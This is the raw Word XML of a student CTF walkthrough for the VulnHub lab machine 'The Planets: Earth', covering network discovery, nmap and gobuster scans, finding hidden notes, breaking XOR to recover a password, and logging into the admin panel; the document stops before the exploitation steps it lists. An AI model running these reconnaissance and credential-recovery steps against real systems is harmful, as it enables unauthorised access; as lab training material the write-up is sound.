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val="en-IN"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1098705477"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="06C9B06D" w14:textId="75692F23" w:rsidR="008D6BB5" w:rsidRDefault="008D6BB5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2820225" wp14:editId="5098EFED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3-31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D850C0" w14:textId="7A4070BF" w:rsidR="008D6BB5" w:rsidRDefault="00B93C2F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3/31/2026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2820225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3-31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D850C0" w14:textId="7A4070BF" w:rsidR="008D6BB5" w:rsidRDefault="00B93C2F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3/31/2026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393091" wp14:editId="2B08F08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D33FC4" w14:textId="798649CE" w:rsidR="008D6BB5" w:rsidRDefault="00000000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YUVARAJ M</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="3C422243" w14:textId="7F72E7B9" w:rsidR="008D6BB5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39309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DD33FC4" w14:textId="798649CE" w:rsidR="008D6BB5" w:rsidRDefault="00000000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YUVARAJ M</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="3C422243" w14:textId="7F72E7B9" w:rsidR="008D6BB5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D6BB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FF9028" wp14:editId="374A1BB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7A056F" w14:textId="04512059" w:rsidR="008D6BB5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Challenge-</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00BB6B9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1</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00B93C2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3</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="5C2F60A5" w14:textId="315A5F85" w:rsidR="008D6BB5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Solving CTF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Machines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from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VulnHub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FF9028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87A056F" w14:textId="04512059" w:rsidR="008D6BB5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Challenge-</w:t>
                              </w:r>
                              <w:r w:rsidR="00BB6B9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1</w:t>
                              </w:r>
                              <w:r w:rsidR="00B93C2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3</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="5C2F60A5" w14:textId="315A5F85" w:rsidR="008D6BB5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Solving CTF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Machines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from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VulnHub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8F823E7" w14:textId="0D34FDAB" w:rsidR="00A328D0" w:rsidRPr="00A328D0" w:rsidRDefault="00C57F5F" w:rsidP="008F2670">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs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565334B" wp14:editId="04032530">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>2148840</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>2000885</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="3596640" cy="4998720"/>
                    <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                    <wp:wrapNone/>
                    <wp:docPr id="24009378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96640" cy="499872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7766E3" w14:textId="69005239" w:rsidR="008F2670" w:rsidRPr="008F2670" w:rsidRDefault="008F2670" w:rsidP="008F2670">
                                <w:pPr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 w:rsidRPr="008F2670"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 xml:space="preserve">The Planets: </w:t>
                                </w:r>
                                <w:r w:rsidR="00B93C2F"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EARTH</w:t>
                                </w:r>
                                <w:r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8F2670"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Walkthrough</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="1E584595" w14:textId="77777777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Platform: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VulnHub</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="68829560" w14:textId="5DB71783" w:rsidR="00130FA5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Category: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B93C2F" w:rsidRPr="00B93C2F">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t>Web Exploitation / Cryptography / Remote Code Execution / Privilege Escalation</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="27CCCE71" w14:textId="08BC8008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Difficulty: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B93C2F">
                                  <w:rPr>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t>Medium</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="77188C4E" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                              <w:p w14:paraId="0CD3B38F" w14:textId="72CFE6C0" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5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565334B" id="_x0000_s1057" type="#_x0000_t202" style="position:absolute;margin-left:169.2pt;margin-top:157.55pt;width:283.2pt;height:393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" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="7D7766E3" w14:textId="69005239" w:rsidR="008F2670" w:rsidRPr="008F2670" w:rsidRDefault="008F2670" w:rsidP="008F2670">
                          <w:pPr>
                            <w:rPr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8F2670"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 xml:space="preserve">The Planets: </w:t>
                          </w:r>
                          <w:r w:rsidR="00B93C2F"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>EARTH</w:t>
                          </w:r>
                          <w:r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 xml:space="preserve"> </w:t>
                          </w:r>
                          <w:r w:rsidRPr="008F2670"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>Walkthrough</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="1E584595" w14:textId="77777777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Platform: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VulnHub</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="68829560" w14:textId="5DB71783" w:rsidR="00130FA5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Category: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</w:t>
                          </w:r>
                          <w:r w:rsidR="00B93C2F" w:rsidRPr="00B93C2F">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Web Exploitation / Cryptography / Remote Code Execution / Privilege Escalation</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="27CCCE71" w14:textId="08BC8008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Difficulty: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</w:t>
                          </w:r>
                          <w:r w:rsidR="00B93C2F">
                            <w:rPr>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>Medium</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="77188C4E" w14:textId="77777777" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                        <w:p w14:paraId="0CD3B38F" w14:textId="72CFE6C0" w:rsidR="00C57F5F" w:rsidRDefault="00C57F5F" w:rsidP="00C57F5F"/>
                      </w:txbxContent>
                    </v:textbox>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="008D6BB5">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="399A9554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The Planet: Earth Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5F9C71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Platform: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VulnHub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</w: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Category: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Web Exploitation / Cryptography / Remote Code Execution / Privilege Escalation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</w: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Difficulty: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Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41018E97" w14:textId="65205426" w:rsid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24491258" wp14:editId="4F90FB82">
            <wp:extent cx="5731510" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="170592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926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B9B09" w14:textId="77777777" w:rsidR="006F1C14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3C8144A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Challenge Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF4820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Planet: Earth is a medium-level machine that focuses on web enumeration, cryptographic weaknesses, remote command execution, and binary exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EED89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goal is to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B688E" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Discover the target machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F56C382" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Enumerate services and web application </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E974DB6" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Identify hidden endpoints </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8CFFC8" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Break weak encryption (XOR) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153D6C22" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Gain initial access via web exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706A0AF9" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Execute commands on the system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F33DC42" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Escalate privileges using SUID binary </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739595BB" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Obtain root access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E2B42" w14:textId="44B43628" w:rsidR="00B93C2F" w:rsidRP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0B481E10" w14:textId="77777777" w:rsidR="006F1C14" w:rsidRDefault="006F1C14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1887B16E" w14:textId="77777777" w:rsidR="006F1C14" w:rsidRDefault="006F1C14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6AEE546C" w14:textId="3C40AF09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Target Information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775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="003DFCB8" w14:textId="77777777" w:rsidTr="00B93C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99E15" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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BA2665E" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="4146947B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4C6C7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691AB960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VulnHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="6D8ACA41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B0F25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Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6240DDD3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The Planet: Earth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="45CAFAA8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E2152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Attacker IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01D0E417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172.20.10.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="6CF06CD8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DC21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Target IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A4FA818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172.20.10.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="32F1E329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C8949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507BA83C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Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="5DF9AB50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45BD0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3062EBB7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Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E2E021D" w14:textId="508E734C" w:rsidR="00B93C2F" w:rsidRP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5613FB82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Enumeration Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A4966C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Step 1 — </w:t>
      </w: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Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B9229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We scanned the local network to identify active hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02932270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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619CD99C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arp-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595514FB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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3012D3D3" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Target identified as: </w:t>
      </w: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172.20.10.2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FA1DB8" w14:textId="2EF69E90" w:rsidR="006F1C14" w:rsidRPr="00B93C2F" w:rsidRDefault="006F1C14" w:rsidP="006F1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462DCF95" wp14:editId="31D18FD2">
            <wp:extent cx="5731510" cy="2497455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="862654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546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1C0B" w14:textId="03EA117D" w:rsidR="00B93C2F" w:rsidRP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14540A93" w14:textId="77777777" w:rsidR="006F1C14" w:rsidRDefault="006F1C14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</w:p>
    <w:p w14:paraId="1946CD10" w14:textId="77777777" w:rsidR="006F1C14" w:rsidRDefault="006F1C14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</w:p>
    <w:p w14:paraId="2521BC65" w14:textId="77267441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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 2 — </w:t>
      </w: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Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4545D6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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E94DFBB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nmap -sC -sV -p- -A -T4 172.20.10.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60580397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Findings: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827"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="4A8EE82B" w14:textId="77777777" w:rsidTr="00B93C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8E9F09" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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1977D452" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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2518FC2C" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="777E4B64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D9EB3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36E1423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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61077E1F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OpenSSH 8.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="25CBADB4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F3D41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207DBF41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131EF5E2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Apache (Fedora)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w14:paraId="3F711141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9AA0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443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DDFA37E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HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="079021E5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Apache (SSL enabled)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FAFB3E4" w14:textId="45ADAAF2" w:rsid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40F75300" w14:textId="08EC18C9" w:rsidR="006F1C14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647F7F08" wp14:editId="138C1731">
            <wp:extent cx="5731510" cy="2065020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="147592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23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52465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Step 3 — </w:t>
      </w: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Virtual Host Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA20630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SSL certificate revealed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D454ED" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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earth.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CADABE" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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terratest.earth.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55369246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Action: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 xml:space="preserve">Edited </w:t>
      </w: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/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29966CCF" w14:textId="77777777" w:rsid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172.20.10.2 earth.local terratest.earth.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586255D4" w14:textId="77777777" w:rsidR="006F1C14" w:rsidRDefault="006F1C14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</w:p>
    <w:p w14:paraId="04314496" w14:textId="6F594AD0" w:rsidR="006F1C14" w:rsidRPr="00B93C2F" w:rsidRDefault="006F1C14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4F97F63D" wp14:editId="6EA45EA9">
            <wp:extent cx="5731510" cy="1497965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="464334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3340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911D3" w14:textId="3283EB25" w:rsidR="00B93C2F" w:rsidRP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448D9036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Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2492D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Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E09DB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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6CED79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gobuster dir -u https://earth.local -w /usr/share/wordlists/dirb/common.txt -k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DF2FC4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Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0238794E" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9245A1" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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/cgi-bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45861658" w14:textId="4D8C2470" w:rsidR="00B93C2F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145ECDFB" wp14:editId="696A0FAB">
            <wp:extent cx="5731510" cy="3089275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2131249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491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0B2E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Terratest Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFDBC0D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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54241E7B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gobuster dir -u https://terratest.earth.local -w /usr/share/wordlists/dirb/common.txt -k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B233C5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Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3778D34D" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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robots.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314EF66F" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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index.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F"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  <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D50C269" w14:textId="4613D30C" w:rsidR="00B93C2F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01945A18" wp14:editId="74B1F1F2">
            <wp:extent cx="5731510" cy="3260725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="148561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6145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F17ED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robots.txt Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3585BA83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file contained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6650FE24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Disallow: /testingnotes.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C32A104" w14:textId="03429EDC" w:rsidR="00B93C2F" w:rsidRPr="00301109" w:rsidRDefault="00B93C2F" w:rsidP="00301109">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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301109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Indicates hidden file with unknown extension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D57EC8C" w14:textId="48FB64BA" w:rsidR="00B93C2F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6F54210A" wp14:editId="011CBC27">
            <wp:extent cx="5731510" cy="3755390"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="146108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820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A8562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Sensitive File Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BE83B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Accessed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7988DAEC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testingnotes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243987B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Key Information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D6D31" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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XOR encryption used </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D92C7B8" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Username: </w:t>
      </w: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terra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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304AC4B" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Reference file: </w:t>
      </w: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testdata.txt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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255299E8" w14:textId="1231D768" w:rsidR="00B93C2F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1D21727F" wp14:editId="25715656">
            <wp:extent cx="5731510" cy="1602105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1510386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861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18E5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Plaintext File Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B2EB32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Accessed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F5CD7C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testdata.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8CC50" w14:textId="3827C663" w:rsidR="00B93C2F" w:rsidRPr="00301109" w:rsidRDefault="00B93C2F" w:rsidP="00301109">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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301109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Contains readable text used for encryption testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A22F0BB" w14:textId="359F378B" w:rsidR="00B93C2F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822934F" wp14:editId="4B63538C">
            <wp:extent cx="5731510" cy="829945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="16724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420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1459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Cryptography Exploitation (XOR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6B48B7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Encrypted data was found on </w:t>
      </w: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earth.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD158AA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Using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734356D5" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Plaintext → </w:t>
      </w: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testdata.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5B9BD5" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79672ADA" w14:textId="77777777" w:rsidR="00B93C2F" w:rsidRPr="00B93C2F" w:rsidRDefault="00B93C2F" w:rsidP="00B93C2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Ciphertext → from web page </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E3E89B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Tool used:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B93C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>CyberChef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F3C15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Recovered password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4790A6D4" w14:textId="77777777" w:rsid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lastRenderedPageBreak/>
        <w:t>earthclimatechangebad4humans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231898DF" w14:textId="77777777" w:rsidR="006F1C14" w:rsidRPr="00B93C2F" w:rsidRDefault="006F1C14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</w:p>
    <w:p w14:paraId="135CEB82" w14:textId="25E06755" w:rsidR="00B93C2F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2CE8DE47" wp14:editId="4E90E97C">
            <wp:extent cx="5731510" cy="3763645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="37942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285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3A18E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Initial Access (Web Login)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6219C1CA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Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C504E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Username: </w:t>
      </w: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terra</w:t>
      </w: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br/>
      </w:r>
      <w:r w:rsidRPr="00B93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Password: </w:t>
      </w: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earthclimatechangebad4humans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1185B8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Logged into:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743C553" w14:textId="4A64B203" w:rsidR="00B93C2F" w:rsidRDefault="006F1C14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hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00795BD3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:b/>
            <w:bCs/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://earth.local/admin/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74684DB9" w14:textId="77777777" w:rsidR="006F1C14" w:rsidRDefault="006F1C14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</w:p>
